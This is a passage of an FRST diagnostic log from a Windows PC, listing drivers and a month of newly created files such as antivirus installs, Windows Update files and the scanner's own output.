R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [137288 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [148632 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [28600 2015-07-15] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [43576 2015-07-15] (Avira Operations GmbH & Co. KG)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-29 20:46 - 2015-07-29 20:48 - 00012001 _____ C:\Users\Richie\Desktop\FRST.txt
2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
2015-07-29 17:42 - 2015-07-29 17:43 - 02169856 _____ (Farbar) C:\Users\Richie\Desktop\FRST64.exe
2015-07-28 19:59 - 2015-07-05 06:08 - 00300704 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-07-28 16:37 - 2015-07-28 16:39 - 00036677 _____ C:\Users\Richie\Downloads\Addition.txt
2015-07-28 16:37 - 2015-07-25 09:34 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-28 16:34 - 2015-07-29 20:46 - 00000000 ____D C:\FRST
2015-07-28 16:34 - 2015-07-28 16:39 - 00072365 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-29 17:09 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-27 20:51 - 00002275 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-29 20:39 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-29 19:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
